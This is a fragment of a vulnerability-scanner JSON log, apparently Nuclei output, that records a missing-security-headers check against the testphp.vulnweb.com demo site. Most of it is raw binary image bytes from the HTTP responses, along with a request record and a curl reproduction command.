k\\ufffdC\\ufffd\\ufffd\\u000bURW%1h\\ufffdf\\ufffd0LNHʹ\\u0005pp\\ufffd[$\\u00128\\ufffd1\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd4k4k\\u000ctp\\ufffdQ\\ufffdj\\u0014\\u0006\\u0005\\ufffd\\ufffd\\ufffd\\u0004d\\ufffdb\\u003e\\ufffd\\ufffd\\u0000涁d1\\u0019^I;_/u\\ufffd`\\ufffdU\\ufffdϾ\\ufffdPO\\ufffd(\\u001eڪ\\ufffdSb'\\n9\\ufffd\\u001a\\ufffd\\ufffd\\ufffd\\ufffd;\\ufffdQ\\ufffd\\u001bco\\ufffdV\\ufffd\\ufffd(\\ufffdo.\\ufffd`\\u001e\\ufffd砺\\ufffd\\ufffd=\\u001bU4\\ufffd_s\\ufffd\\ufffd\\ufffd̴\\ufffd0H\\ufffd`\\ufffd]\\ufffd%\\ufffdڛd9\\u001e\\ufffd\\ufffdǖ\\ufffdjΣ\\ufffd{\\ufffd\\ufffd\\ufffd%m\\ufffd\\ufffd$\\ufffd\\ufffdMٍ\\ufffdi\\ufffdA\\ufffd~\\u0000\\u0000\\ufffd\\u0007 \\ufffd\\ufffdg!\\ufffd\\ufffd+\\ufffd\\ufffd\\ufffd\\ufffdX\\ufffd\\ufffdG'|\\ufffdL\\ufffd\\ufffd\\u0015\\ufffdU5\\ufffd\\ufffdF\\u0019\\ufffd\\ufffd8\\ufffd\\ufffd\\ufffd^K\\u0013C̣-9\\ufffdm\\u0015\\u003cw\\u0010\\ufffd\\u0019\\ufffd\\ufffd{\\ufffd\\ufffd\\ufffd|A\\ufffdZ\\ufffd\\ufffdqhb\\ufffd\\ufffdX)\\ufffd\\ufffdV.\\ufffd\\n$\\ufffd\\ufffdV\\ufffd\\ufffd\\u003e\\ufffdAb\\ufffd\\ufffd\\ufffd\\ufffd3\\ufffd\\ufffd\\ufffdm\\ufffd\\ufffd\\ufffd\\ufffdZ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdh\\ufffdH\\ufffdե\\ufffd\\ufffdnL\\ufffd\\ufffd!M\\ufffd\\ufffd\\ufffd#:=\\ufffd-Cp4\\ufffd\\ufffdV\\ufffd\\ufffde\\ufffdd\\ufffd\\ufffd\\u0004\\ufffd\\ufffd$\\ufffd]\\ufffd9\\u000c\\ufffd\\u0001\\ufffd\\u003cc\\u001ccZGZOWm\\ufffd\\ufffd\\ufffd\\ufffdVe\\ufffd\\ufffd\\ufffd5c*\\u0026\\ufffd\\u0000\\ufffdO\\ufffdn\\ufffd9\\u003c\\ufffd\\ufffd\\ufffd\\ufffd5΢\\ufffdݣ9\\u0019\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdMyBQ\\ufffdwY\\ufffdw\\ufffd*\\u000c\\u0001fWڏ\\u000e\\ufffd\\ufffd\\u0012\\ufffd\\ufffd\\u0019\\ufffd8]\\ufffda\\u0019\\u0004\\ufffd\\ufffd\\u0000\\u001fQ[SU\\ufffd\\ufffd\\ufffd\\u001c\\u0014\\ufffdћ\\\\Tp\\\\.\\u0017j\\ufffdV\\ufffd\\ufffd\\ufffd!\\u000b\\u0012\\ufffdQcUe-\\ufffdd\\ufffd\\ufffd\\ufffd\\ufffdP\\u0000;\\ufffd\\ufffd\\ufffd\\ufffdE4d\\ufffd)h\\ufffd\\ufffd3\\ufffd\\ufffd\\ufffd\\ufffd \\u0012\\u0001ǶH\\ufffd\\ufffduk}ɵ-.\\ufffd\\ufffd\\ufffd\\ufffdgO\\ufffd\\ufffd7;G\\ufffd\\ufffd\\ufffd-ӿs\\ufffdN\\ufffdVDA\\u0019ld\\ufffdJ\\ufffd2\\u0000$\\u0003\\ufffd\\ufffdp\\ufffd\\ufffd\\ufffd7U.\\ufffdY%\\ufffd\\ufffdZ%\\ufffd\\ufffd\\ufffd\\ufffd\\ufffde\\ufffd\\u0003~\\u003eV%X\\ufffd\\ufffd'\\ufffd\\ufffd\\ufffd\\ufffd\\u0018%z\\ufffdWM;F\\ufffdv\\u001f\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffdé\\ufffd\\ufffd\\ufffd\\ufffd}?UCp\\ufffd[\\ufffdvj\\ufffdTn\\ufffd\\ufffd~\\ufffdɂ\\ufffdF1\\ufffd\\ufffd\\ufffd\\ufffdO,t\\ufffd\\ufffdq\\ufffd\\u0008\\ufffd\\ufffdϏ\\ufffdT\\ufffd\\ufffdm\\ufffd\\ufffd8;\\ufffd\\ufffd+A\\ufffdKUl\\ufffdW$\\ufffd{c\\ufffd;\\ufffd\\ufffdȩj'W\\u0006\\u0005A\\ufffd\\u001bҪIS\\ufffd\\ufffd\\ufffd\\u003c\\ufffd\\ufffd\\rc\\u0015\\u0015\\ufffd_\\ufffd\\ufffd\\ufffdqV\\u001d\\ufffdaI6\\u0000\\u000e\\ufffd\\ufffd]\\ufffd\\r\\ufffdU\\ufffd\\ufffd\\ufffd\\n\\ufffd[WY]h\\ufffdJ\\ufffd\\ufffdm\\ufffd\\ufffdWYd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdJ\\ufffd(\\ufffd\\ufffdQ\\u0013v\\ufffd\\ufffd@_\\ufffdQ\\ufffd\\ufffds\\ufffdܱ\\ufffd\\ufffd5\\ufffd\\ufffdA\\u0007b\\ufffd\\ufffd9h\\ufffd+$\\ufffdUWA\\ufffdHm\\ufffdGX\\ufffd\\u0003\\u0003f\\ufffdƒ\\ufffd\\ufffdY%\\ufffd\\ufffd\\ufffd\\ufffd.'\\u0019=3\\ufffd\\ufffd\\ufffd\\u0015E\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0001\\ufffd\\ufffd\\ufffdr\\ufffd\\ufffdA\\ufffdx^E\\ufffd\\ufffd\\ufffd@'\\ufffd\\u0000\\ufffd\\ufffd\\ufffd\\u001af\\u001bF\\ufffd\\ufffd6\\ufffd\\ufffd@\\ufffd\\u003c\\ufffd\\\",c\\ufffd\\ufffdJ)c\\ufffd!|\\u000c\\ufffdg\\ufffd\\u0001\\ufffd\\ufffd\\ufffd%\\ufffd\\u000f\\ufffd\\ufffdm!xo\\ufffd\\u0000\\ufffd\\\\\\ufffd\\ufffd\\ufffd9\\ufffd\\ufffd\\ufffd\\u003cU\\ufffd\\ufffd\\ufffd\\u003c\\ufffd\\r\\ufffd\\ufffdOG\\u0019\\ufffdD\\ufffd3\\ufffdF|\\ufffdi\\ufffd*\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd.\\ufffd\\r\\u001fv\\ufffd\\ufffdX;\\ufffd\\ufffdh{\\ufffd\\ufffd\\ufffd\\\\\\u0005]\\ufffdrJ\\ufffd\\ufffd\\ufffd\\u003c\\ufffd\\u0000:\\ufffd\\ufffd\\ufffd\\ufffdD\\ufffd;!\\ufffd\\ufffd\\\"\\ufffdv\\ufffdz\\ufffdV+\\ufffd\\ufffd\\ufffd\\ufffdO\\ufffdV\\ufffd\\ufffd\\ufffdxRV=Ѝ\\ufffd\\u0004\\ufffd\\ufffdD\\ufffd\\ufffd\\ufffdj\\ufffd\\ufffd\\u0015$\\ufffdM\\ufffd\\ufffd:\\u0003\\ufffdT\\ufffd\\ufffd\\ufffdۜ\\ufffd\\ufffd[;\\ufffd\\u0010IfR\\ufffdN\\u000b\\u001e[\\ufffd\\u0006p\\u003ch\\ufffd)\\ufffd#Ս\\u000fo|\\ufffd\\u0010e:\\ufffd|\\ufffd\\u0011\\ufffd\\ufffdc\\ufffd\\ufffd\\u0010\\ufffd}\\ufffduf\\ufffd\\u000cq\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd-Mgj\\u0026bx\\u0003?MA\\ufffd\\ufffde\\u000c$\\ufffdH$\\u001c4r.\\ufffdS\\ufffdy\\u0007\\ufffd\\u001f\\ufffd\\ufffdt\\ufffd\\u0007\\ufffd:\\ufffdc\\ufffdyo\\u0018\\u001a\\u0005\\\"\\ufffd\\ufffd\\u001b\\ufffd\\ufffd5c\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdz\\u000e\\u000f\\ufffd\\ufffdЕ\\\\\\ufffdT\\ufffd\\ufffd[N\\ufffd\\ufffd;\\ufffd\\ufffd*\\ufffdi\\ufffd\\ufffdU\\ufffd\\u0000e\\ufffd$c \\ufffdyʰP\\ufffd\\ufffd[\\u00168\\ufffd\\ufffd\\u0014\\u0014o\\ufffd\\u003c=\\u0013\\ufffdSG\\u001f\\u000c\\ufffd3\\ufffd\\u0002|ꅪ袞W\\ufffd\\ufffdZр\\ufffd;\\ufffd\\u001e\\u0018{6\\u003ed?\\ufffd\\u0006\\u001b\\ufffd\\ufffd\\ufffd\\ufffd}_\\ufffd\\ufffdY\\u001fn\\ufffdR\\ufffdH\\u0003,sQwx`\\u0000;\\u001dH \\ufffd\\u0018\\ufffd\\ufffd\\u0004{\\u001d\\u0015^\\ufffdn\\ufffd\\ufffd\\ufffdvJ\\ufffd=\\u001a\\u001b\\ufffdD\\ufffd\\ufffd2mٖ*@E\\u0001\\ufffd*\\u000cP\\u0007\\ufffdF2F\\ufffdnW8\\ufffd\\u000c' \\ufffdd\\u001d\\ufffd\\ufffdm\\ufffd\\ufffd\\ufffdo\\u0017Q\\ufffd[t\\u000f\\ufffdj\\ufffd\\ufffd\\ufffde\\u0013R\\ufffdOGN\\ufffdݎ\\ufffd\\u0011\\u001231J\\ufffd!US\\ufffd2\\u0008\\ufffd\\ufffdr\\t'ZM\\ufffd\\ufffdYx\\ufffd\\ufffdd\\u0011\\ufffd\\ufffdW\\ufffdY\\ufffd*e_F\\u0019\\u0015\\ufffd\\ufffdh\\ufffd\\ufffdK\\u0002\\ufffd\\ufffd\\ufffdIпº\\ufffdT\\r;\\ufffdf\\ufffd\\ufffd\\ufffdQ+\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd;{{\\ufffd\\u0000g\\ufffd\\u00060\\ufffdc\\ufffdt۽eB[n]\\ufffdI\\ufffd\\ufffdPc\\u000b\\u0018\\u0007\\u0001pp\\u000f\\ufffd\\u00089\\ufffd\\ufffd\\ufffd\\ufffd\\u0005d\\ufffd\\u0013?\\ufffd\\ufffd\\u0001\\ufffd\\ufffds\\ufffd\\ufffd׿\\ufffd4T\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd|J\\ufffd\\ufffd\\u001a\\ufffd\\ufffd\\u0015\\ufffd6\\ufffd\\ufffd\\ufffdi\\u0016)\\ufffd\\ufffd\\ufffd\\u0001e\\ufffd\\ufffdrB\\ufffd\\u0007\\ufffd\\ufffd\\u000c\\u0002\\u00179\\u0004\\u0003\\ufffdz:\\ufffd\\ufffd\\ufffdG/e@\\ufffd\\ufffd\\ufffdZ\\ufffd\\ufffdj\\ufffd\\ufffd=\\u00038P?P\\ufffd\\ufffd\\u003e\\u0017\\u001bpwj\\ufffd\\ufffd\\u0015l7\\u001b\\u001d\\ufffd\\u000b\\ufffd(\\ufffd\\ufffd\\u0011\\u0011hX\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u001f(\\r\\ufffdb\\u0014\\ufffd\\ufffd\\u0017\\u0019k\\ufffd\\ufffdm\\ufffd\\ufffd\\ufffdr\\ufffd\\ufffdjAFn\\ufffdR1\\ufffdR\\ufffd!\\ufffd=\\ufffdn\\ufffdh-\\ufffd8\\ufffd=@s\\ufffd\\ufffd\\ufffd\\ufffd5\\ufffd\\ufffd7G\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdP5\\u0014\\ufffdԞ'\\u0015\\ufffdݮL\\ufffd)G }\\ufffdI֫\\ufffd\\ufffd\\ufffdg\\u0002\\ufffd\\ufffd\\u0005\\ufffd\\ufffdcC\\u0015K\\ufffdd\\ufffdϾ\\u003e\\ufffdi\\ufffd'v͏\\ufffd\\ufffd\\u000c\\ufffd\\t\\ufffd\\ufffd#w_\\ufffd\\ufffd\\ufffd:k$\\ufffd\\ufffdֺ\\ufffd\\ufffd\\ufffdI\\u0017a@\\u000c\\ufffd͂\\ufffd\\u0001l\\ufffd2\\ufffd3\\ufffdS\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd4v0\\ufffd\\ufffd02\\ufffd\\ufffd\\ufffd\\ufffd\\u0001$\\u001e\\ufffd\\ufffdާ\\ufffd\\ufffd\\ufffdʐq\\ufffd*L\\ufffd\\\\\\u0005{DP\\ufffdWi\\ufffd\\ufffdV\\ufffd*AK\\ufffd\\ufffdʛ\\ufffd-$S\\ufffdL\\ufffd5\\ufffd\\u0008\\ufffd\\ufffdI\\u0004\\u000f\\u001c\\ufffde\\ufffd\\ufffd\\ufffd,\\ufffd\\ufffdX2\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd#`\\u001c\\ufffd\\ufffd[`\\u003e\\ufffd\\ufffd`\\ufffd\\ufffd1*\\ufffd{\\ufffd\\ufffd1b\\u0014\\ufffdT\\ufffd\\ufffd\\ufffd\\ufffd\\u0004\\ufffdG\\ufffd\\u000c[\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd4\\ufffdY]\\ufffdE\\u0010\\ufffd!\\ufffd\\ufffd\\n\\ufffd\\ufffd\\ufffd\\u0000\\u000f\\ufffd\\ufffd\\u0015\\u001c\\ufffd\\ufffd\\u0008\\ufffd\\ufffd\\u000bE(\\ufffd\\ufffd\\ufffdq\\ufffd\\u003c\\ufffd\\ufffd\\ufffdΓ\\u003c#\\u0019E\\ufffd\\ufffd\\u0000\\ufffd\\u0007\\ufffd՜S}1\\ufffd\\u001d\\u0008Q\\ufffdIRf\\u0014\\ufffd\\n\\ufffdK\\ufffdy\\ufffd\\u0010\\ufffd\\ufffd0\\ufffd\\ufffd\\u0008\\u0018\\ufffd\\ufffdd\\ufffd\\ufffd8\\ufffd\\ufffd3\\ufffdu\\ufffdH\\ufffd\\ufffd\\u00063\\\"\\ufffd\\u001e\\ufffd\\u0004\\ufffdG\\ufffd\\u000c\\t\\u0007\\ufffdi\\ufffdU\\ufffd9\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd*-ҵ\\ufffd\\ufffd\\r\\u0011\\u0014\\ufffdq\\ufffd\\ufffd\\ufffd-ܳ\\ufffd\\ufffdR\\u00179S\\ufffdX\\ufffdA\\ufffd\\u0006\\u001c0#ʌ\\ufffdFG\\ufffdA\\ufffd\\ufffd\\u001fC\\ufffdB\\ufffd\\ufffdc\\ufffdkl\\ufffd\\ufffd0\\ufffd\\ufffd\\u0015\\ufffd\\ufffd:\\u0019\\u0003۸U\\ufffd3Av\\ufffd]\\ufffd\\ufffdZ\\ufffdyv\\ufffd\\ufffd\\ufffd0dm\\ufffd\\t\\u0001\\ufffd\\ufffd\\ufffdv.p\\u0006\\\\~ڕOr\\ufffdE\\ufffd\\ufffd\\ufffd\\t)\\ufffd\\ufffd\\u001b\\ufffd\\t$\\u001b{\\ufffd=\\ufffd\\ufffd\\ufffd8\\u0005\\ufffdό\\ufffdy\\u0007T\\ufffdN\\ufffdP!\\ufffdz\\ufffd\\ufffdV\\ufffdgJh\\ufffd\\ufffd\\ufffdul*\\ufffdKnU\\ufffd\\ufffd\\ufffd\\u0003#E6n\\ufffd\\ufffd\\ufffd\\u001b\\u0005'P\\\\\\u001e\\ufffd\\ufffdS\\u00075\\ufffd,\\ufffd;\\ufffd\\u001d\\ufffd\\ufffd[i,\\u00102\\ufffd\\ufffd\\ufffdn\\ufffds\\ufffdLUܤ\\ufffdJ8\\ufffd\\ufffd\\u001d\\ufffd\\ufffd\\ufffd'\\ufffd\\ufffda\\ufffd\\ufffd_\\u0017\\u0017\\u000e\\u001c\\ufffd\\ufffdW\\ufffdQ\\u0006J\\ufffd\\u003c-\\ufffdQ\\ufffd\\ufffd\\ufffd\\ufffdpA\\ufffd\\ufffd\\u0011\\ufffd\\ufffdt\\ufffd\\ufffd\\u001a\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdU\\ufffd\\ufffd\\ufffd\\u0012\\u001aVffyQQ1\\ufffdA\\u0019Q\\ufffd\\ufffdC`\\ufffdDղR,]\\ufffdY\\ufffd,^'ĉ\\u001dJ+\\ufffd,\\u003eW\\ufffd\\ufffdXd`\\ufffd\\u001c\\u0010u\\ufffd\\ufffd1\\ufffd\\ufffdId\\ufffd\\ufffd\\ufffdAs5MJ\\ufffd:KT\\ufffd+\\u0018\\ufffdf\\ufffd-\\ufffd,\\ufffd\\ufffdx\\ufffdq\\ufffd\\ufffd[\\u0000\\ufffd]\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd^\\ufffdZ\\ufffdK\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdB\\ufffd\\ufffd\\u003c\\ufffdp\\ufffd.\\u0000\\ufffd\\u0012\\ufffd\\ufffd\\ufffd\\u0003\\ufffdq\\ufffd\\u0019\\ufffd\\ufffd0H`\\t*qQ]++J\\ufffdK$/,f)\\u000cNW\\ufffd\\ufffdʶ\\u003c\\ufffd\\ufffd\\u003ck\\ufffd\\ufffd\\ufffdN\\ufffdʉ(\\ufffd\\u001a\\ufffd\\u0001\\u0000-+2\\ufffd\\ufffd8ǥW\\ufffd1\\ufffd\\ufffdH,I$\\ufffd\\u001d\\\\\\ufffdmt\\ufffd+\\ufffd2K\\u003c\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdX\\ufffd\\ufffd\\u001fՖl\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd^\\ufffd\\ufffdbi\\ufffdn\\ufffd[@b\\ufffd\\ufffd\\ufffd\\\"n\\ufffd\\ufffd\\ufffdΏ\\ufffd\\ufffd\\ufffd\\u003c\\ufffd\\ufffd\\ufffdEZU\\ufffdt\\u0010\\ufffd\\u0015,\\ufffd\\ufffdWԹQ\\ufffdF\\t\\u003c`6\\ufffd\\ufffd\\ufffd\\u0000\\u0010\\ufffd\\ufffdK\\ufffd\\ufffdl\\u0014\\ufffd\\ufffd̴\\ufffd\\ufffdB\\ufffd\\ufffd\\ufffdŰ\\ufffds\\ufffd\\ufffd \\ufffd\\ufffdƾ|\\ufffd\\ufffd\\ufffd])^\\ufffd\\ufffd\\t\\ufffd\\ufffd\\ufffd7Ԏ\\u0007k\\ufffd\\ufffd|\\ufffd\\ufffd9\\u001e\\ufffd\\u0007\\ufffdg\\ufffd/\\ufffd3T\\ufffd\\ufffd2PR\\ufffd\\ufffd[䥑\\ufffd\\ufffdz\\ufffd\\ufffdL\\u0018\\ufffd\\ufffdW\\u0000\\ufffd!\\ufffdeJg#\\u0007\\ufffd\\ufffdu\\ufffd\\n|\\u00170\\u0002\\ufffd~\\ufffd_Ң\\ufffds\\ufffd\\u0000\\ufffd\\ufffd'\\ufffd\\ufffdQY\\ufffd\\ufffdn\\u001f\\ufffd\\ufffd\\ufffdJ\\ufffd\\ufffd\\u000c\\ufffd\\ufffd%cR\\u0017\\u0000\\ufffd@,Wv|\\ufffd\\ufffdG,\\ufffd?X\\ufffdkii\\ufffd\\u0015@\\ufffd\\ufffda}\\ufffd\\ufffdG!,P\\u000c\\ufffd\\u000f|\\ufffd\\t\\u003c\\u0003\\ufffdh{\\ufffd\\ufffd \\ufffd\\ufffdf\\ti\\ufffd\\ufffd2\\ufffd\\ufffd2\\ufffd\\ufffd\\ufffd\\ufffd\\u001c\\ufffd\\ufffdX\\ufffd\\u001c\\ufffd\\u001fvÝہ\\u0019\\u0007X\\ufffd\\ufffd\\ufffdi\\ufffd\\ufffd\\ufffd\\n\\ufffd\\ufffd\\ufffdm E,\\ufffd\\ufffd\\ufffddv\\ufffd\\u0017R0\\ufffd\\u0001\\ufffd\\u000c\\ufffd\\ufffd\\u000c\\ufffd\\ufffd\\ufffdE%\\ufffd\\ufffd4\\ufffd\\u0001\\u0000g\\u001e#l\\u001f\\ufffd\\ufffdDI8n\\ufffd\\ufffd\\ufffdi\\ufffd\\ufffd\\ufffd?m\\ufffdD\\ufffdl\\ufffdU\\ufffd\\u001dxl6\\u003c\\ufffd\\ufffd\\u001f\\ufffd\\u000f\\ufffd\\ufffd+\\ufffd\\ufffd\\ufffd\\ufffd !\\ufffdx\\ufffd⎵\\ufffd\\u0005\\ufffd^\\ufffdc\\ufffd\\u0013hR\\u000eO\\ufffd\\ufffd,Ř\\ufffd\\\\\\ufffd9ZZ\\ufffd\\ufffd1\\ufffd\\ufffddu\\tU\\u001b\\ufffd$\\ufffd\\u003e\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd3h\\ufffdj\\ufffd\\ufffd\\u0015\\ufffd\\u000cdp]\\u0002'\\ufffd\\ufffd\\ufffd\\u0019S\\ufffd\\ufffd\\ufffd8\\u0004k@\\ufffdė\\ufffd\\ufffdq\\\\n۪\\ufffd\\u0019e\\ufffdY\\u001d\\ufffdQZF$\\ufffd\\u000e\\t\\ufffd\\ufffd'?3\\u000f\\u0007\\u001aZZAZ\\ufffd\\ufffd\\u0018\\ufffd\\u000c\\u001e\\u003e\\ufffd\\ufffd\\ufffdd\\ufffd\\ufffd\\ufffd\\ufffdz\\ufffd\\ufffd\\u001b?Kt\\ufffd[\\ufffd\\ufffd~k\\u000b\\ufffdU\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdj1\\ufffd`\\r\\ufffd\\ufffd\\ufffd\\u001f\\ufffd`\\n1#,x\\u0007KKU\\u0016\\ufffdL\\u001cG|\\ufffd\\ufffdO^\\u003e0\\u0017\\ufffd\\ufffd\\ufffdS$K;\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd6bU\\u0001bH\\u0003\\u003cd\\ufffd\\ufffd\\u0016P\\ufffdr\\ufffd\\u0000\\u0018\\ufffd\\u001aZZmn\\u0000F\\u0008Jn\\ufffd\\ufffdaL.\\ufffd\\ufffd\\ufffd\\ufffdRQ\\ufffdϨl\\ufffd5\\u000f\\\"\\ufffdS_\\u0005;\\ufffd\\ufffdkly\\u0002\\ufffd\\u000f\\ufffd\\u0007Ζ\\ufffd\\ufffd\\ufffd$S\\ufffd\\ufffd\\ufffd\\u0003B\\u0001\\ufffd\\ufffdU_\\r\\ufffdpuWX\\ufffd\\ufffdwf\\ufffd\\ufffd\\u0026\\u000c\\ufffd,m\\ufffd\\ufffd\\ufffd-\\ufffd\\ufffd\\u0002F\\u000e9ǂ5\\ufffdX\\ufffdd\\ufffd\\ufffd\\u000e\\ufffd\\ufffd鈒\\ufffdA\\u0014i\\u0014O\\ufffd,\\u000b\\u0014;\\ufffd\\ufffd\\ufffdң\\ufffd\\ufffdϜaik\\ufffd{@\\ufffd\\ufffd\\ufffd\\t\\ufffd\\ufffd\\n\\ufffd\\ufffd\\u0000\\ufffdN\\ufffd%\\ufffd\\ufffdIGE\\u0005\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0018鷡U%\\ufffd\\t\\\\\\ufffd\\u000cĐ\\ufffd\\ufffd\\ufffd\\u0007\\ufffdA9ڸ1\\ufffdJ\\ufffd\\ufffd\\ufffd\\ufffdui_RgM\\ufffdYʾ\\u000fv#\\ufffd\\ufffdr}M\\ufffd?1\\ufffdx\\ufffd\\ufffd֩\\u003e*Fqk\\ufffd\\ufffd\\ufffd9\\ufffdE\\ufffd\\ufffdT\\ufffd5L\\ufffd\\ufffd\\u001bܖ8\\u0018\\u0019Ή\\ufffd\\u0016\\ufffd\\ufffdA\\ufffd6x\\ufffdj\\ufffd\\ufffd\\u0013ԤNar\\ufffd\\ufffd\\u0010\\u0008\\ufffdA\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdw\\u000f\\u000f\\ufffd\\u0011\\ufffd:\\ufffd\\u0007\\ufffdhi\\u001a\\ufffd4\\ufffd\\ufffd)\\ufffdnW\\n\\ufffdi\\ufffda$B\\u0002E6\\u001dP\\ufffd\\u0003\\ufffd\\ufffdd\\ufffd\\ufffd\\ufffdi\\u0005\\ufffd\\ufffd\\ufffdD\\ufffdT\\ufffd(\\ufffd\\u0019\\u000b\\ufffd\\u000br\\ufffdP\\ufffd\\u0000\\ufffd@\\ufffd\\ufffd\\u001f\\ufffdKK\\\\\\ufffdW\\ufffd\\ufffdX3տ\\ufffd՟#\\ufffdVY\\ufffd\\ufffd\\ufffdC\\u001d\\u0002\\ufffdv;\\ufffdU\\ufffd\\ufffd\\u000c\\ufffdHwaDn\\ufffd\\u0000\\ufffd\\ufffd1\\ufffd\\u0000\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdm\\ufffd\\ufffdVR\\ufffd\\u0013;,Ԑ\\ufffd6\\ufffd\\u000e\\u0019\\ufffd$\\u000e\\u003ciij\\ufffd\\ufffd\\ufffdLM\\u0005.\\ufffd\\ufffd+\\ufffd\\ufffd\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:37.197041724Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/606.1.36 (KHTML, like Gecko) Version/9.1.2 Safari/606.1.36' 'http://testphp.vulnweb.com/pictures/7.jpg.tn'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-resource-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/pictures/8.jpg.tn\",\"path\":\"/pictures/8.jpg.tn\",\"matched-at\":\"http://testphp.vulnweb.com/pictures/8.jpg.tn\",\"request\":\"GET /pictures/8.jpg.tn HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 4139\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:42:25 GMT\\r\\nEtag: \\\"4dca64a1-102b\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0010JFIF\\u0000\\u0001\\u0001\\u0000\\u0000\\u0001\\u0000\\u0001\\u0000\\u0000\\ufffd\\ufffd\\u0000C\\u0000\\u0006\\u0004\\u0005\\u0006\\u0005\\u0004\\u0006\\u0006\\u0005\\u0006\\u0007\\u0007\\u0006\\u0008\\n\\u0010\\n\\n\\t\\t\\n\\u0014\\u000e\\u000f\\u000c\\u0010\\u0017\\u0014\\u0018\\u0018\\u0017\\u0014\\u0016\\u0016\\u001a\\u001d%\\u001f\\u001a\\u001b#\\u001c\\u0016\\u0016 , #\\u0026')*)\\u0019\\u001f-0-(0%()(\\ufffd\\ufffd\\u0000C\\u0001\\u0007\\u0007\\u0007\\n\\u0008\\n\\u0013\\n\\n\\u0013(\\u001a\\u0016\\u001a((((((((((((((((((((((((((((((((((((((((((((((((((\\ufffd\\ufffd\\u0000\\u0011\\u0008\\u0000d\\u0000\\ufffd\\u0003\\u0001\\\"\\u0000\\u0002\\u0011\\u0001\\u0003\\u0011\\u0001\\ufffd\\ufffd\\u0000\\u001c\\u0000\\u0000\\u0001\\u0005\\u0001\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0006\\u0000\\u0002\\u0003\\u0004\\u0005\\u0001\\u0007\\u0008\\ufffd\\ufffd\\u0000;\\u0010\\u0000\\u0001\\u0003\\u0002\\u0004\\u0002\\u0006\\u0008\\u0005\\u0004\\u0002\\u0003\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0011\\u0000\\u0004\\u0005\\u0012!1AQ\\u0006\\u0013\\\"aq\\ufffd\\u00142T\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd$B\\ufffd\\ufffd\\ufffd\\u0015#3\\ufffdRb4r\\ufffd\\ufffd\\ufffd\\u0000\\u001b\\u0001\\u0000\\u0002\\u0003\\u0001\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0000\\u0003\\u0004\\u0005\\u0006\\u0007\\ufffd\\ufffd\\u0000(\\u0011\\u0000\\u0002\\u0001\\u0003\\u0003\\u0004\\u0002\\u0002\\u0003\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0011!\\u0004\\u00141\\u0005\\u0012AQ\\u0013\\u0015\\\"B2ab\\ufffd\\ufffd\\ufffd\\u0000\\u000c\\u0003\\u0001\\u0000\\u0002\\u0011\\u0003\\u0011\\u0000?\\u0000\\ufffdS\\ufffdK\